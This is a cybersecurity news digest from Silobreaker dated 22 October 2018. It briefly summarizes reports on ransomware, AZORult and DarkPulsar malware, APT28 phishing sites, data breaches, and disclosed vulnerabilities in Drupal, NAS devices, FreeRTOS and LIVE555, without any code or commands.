Silobreaker Daily Cyber Digest – 22 October 2018
Kraken Cryptor ransomware 2.0.6 connects to BleepingComputer during encryption
- The new version of Kraken Cryptor was discovered being distributed via malvertising and the RIG exploit kit. Analysis of the file hashes and other information uncovered that the ransomware had infected 217 victims from all over the world.
- The new variant encrypts the computer using the smethod_4 function with the shortened URL. When the encryption is finished the ransomware begins to connect to BleepingComputer[.]com via the shortened URL.
New version of Azorult spotted in the wild
- Researchers from CheckPoint registered a new version of the AZORult Stealer, labelled AZORult 3.3, being distributed in the wild. AZORult is an information stealer and malware downloader.
- This newest version is distinguished by its new encryption method to obfuscate the C2 domain name, new C2 connection method and an improved cryptocurrency wallet stealer and loader.
- AZORult 3.3 was found to be delivered through the RIG exploit kit, amongst other sources. This version was first seen advertised on an underground forum on October 4th, 2018.
Source (Includes IOCs)
New campaign distributing DarkPulsar detected
- Kaspersky researchers have detected a new campaign distributing DarkPulsar, a malware allegedly developed by the US National Security Agency (NSA).
- The research team was led to their discovery following the analysis of two frameworks dumped online by The Shadow Brokers in spring 2017. This leak consisted of numerous surveillance tools and exploits by the NSA designed to target Windows PCs and servers.
- DarkPulsar was found to typically infect the Windows 2003/2008 Server and used as a backdoor to infected computers. The researchers found that the campaign has targeted around 50 victims located in Russia, Iran and Egypt, targeting sectors such as nuclear energy, telecommunications, IT, aerospace and R&D.
Microsoft accuses Russia of using phishing sites to interfere in US elections
- Microsoft’s Digital Crimes Unit reportedly used court orders 12 times since 2016 to shut down internet domains and fake websites associated with APT28.
- Microsoft is concerned that APT28 is using these websites, resembling those of American political parties and connected groups, to attempt to influence the 2018 elections.
SettingContent-ms files can be abused to deliver DeepLink and Icon-based payload
- Trend Micro researchers have found that Microsoft’s SettingContent-ms may be exploited using the DeepLink and Icon tag.
- Through replacing the command line under the DeepLink tag, a PowerShell script could be used to download and execute a payload from a malicious site. This was similarly found to work under the Icon tag, which even permitted the deployment of long, complicated or obfuscated scripts.
- SettingContent-ms files were first introduced on Windows 10 systems. They contain setting content for Windows functions such as update process and default applications used to open specific file types.
Leaks and Breaches
Yale University hit with second lawsuit over decade-old data breach
- Yale University suffered a breach between April 2008 and January 2009, that resulted in the compromise of students’ electronic records that included Social Security numbers, dates of birth, email and home addresses.
- The lawsuit by defendant Andrew Mason claims that Yale improperly stored the personal data, allowing the breach to occur.
US Government computer system interacting with Healthcare[.]gov breached
- The Centers for Medicare and Medicaid Services stated that a government system used by healthcare insurance agents and brokers was hacked, resulting in the compromise of 75,000 people’s data.
Adult websites hacked exposing personal data
- Eight adult websites were hacked, leading to the exposure of 98MB of personal data. The exposed data includes IP addresses, user passwords protected by an outdated cryptographic scheme, names and 1.2 million unique email addresses. The websites have been taken down and users are encouraged to change their passwords.
Grand Theft Auto (GTA) update allows cheats to harass other players in single player modes
- The Grand Theft Auto game update 1.45 reportedly allowed mod menu users to target their exploits using unique ID codes from Rockstar Social Club. Once a player’s ID number was found, the server-mod-style exploits could be used against anyone providing they are logged in.
- One player named ‘SnowieLive’ had a cheater interrupt his stream by kicking him out of his session and claiming to be an administrator with GTA. When SnowieLive restarted in single player mode, he began dropping dead as soon as the game began, and received an in-game chat message stating ‘Ur not safe in singleplayer’, which should not be possible outside of multi-player mode.
Drupal patches several critical security issues in Drupal Core
- The security update contained two critical and several moderately critical flaws in Drupal Core versions 7.x and 8.x.
- The first critical flaw, found in Drupal 8, was an injection in DefaultMailSystem mail that took place when some sent emails were not being sanitised for shell arguments, which could lead to remote code execution.
- The second critical flaw, also found in Drupal 8, resided in contextual links validation where that module does not sufficiently validate the requested contextual links, which can also lead to remote code execution.
Vulnerabilities discovered in WD My Book and more
- WizCase security researchers discovered multiple critical vulnerabilities in WD My Book, NetGear Stora, SeaGate Home and Medion LifeCloud NAS.
- The researchers discovered the four NAS devices all suffered from two zero-day unauthenticated root remote command execution vulnerabilities (CVE-2018-18472 and CVE-2018-18471). Hackers, governments and criminals could exploit the vulnerabilities to read files, modify data, add or remove users and execute commands with highest privileges.
- Almost 2 million affected devices are online.
FreeRTOS vulnerabilities expose several systems to attacks
- FreeRTOS is an open source operating system created specifically for microcontrollers, that is used in several instances, including industrial applications, B2B solutions and consumer products. Zimperium’s zLabs analysed FreeRTOS’s TCP/IP stack and AWS secure connectivity modules and found over a dozen vulnerabilities that impact OpenRTOS and SafeRTOS.
- The vulnerabilities include four remote code execution flaws, one denial of service and seven information leak issues. zLabs stated that these vulnerabilities could allow an attacker to leak information from the device’s memory, crash the device, and remotely execute code.
Critical flaw found in LIVE555 Streaming Media RTSPServer
- Cisco Talos researchers disclosed a critical code execution vulnerability, tracked as CVE-2018-4013, in Live Networks LIVE555 Streaming Media RTSPServer. LIVE555 Streaming Media is a set of open source C++ libraries for multimedia streaming by Live Networks. It is used by popular software such as VLC and MPlayer.
- The flaw was found in the ‘HTTP packet-parsing functionality of the LIVE555 RTSP server library’. The vulnerability affects LIVE555 Media Server version 0.92, but may also be present in earlier versions of the product.
Twitter takes down bot network distributing pro-Saudi messages mentioning Khashoggi
- Twitter has taken down a bot network that spread pro-Saudi government tweets related to the murder of journalist Jamal Khashoggi. Hundreds of accounts were found to be tweeting and retweeting the same messages, likely as part of a Twitter influence campaign.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein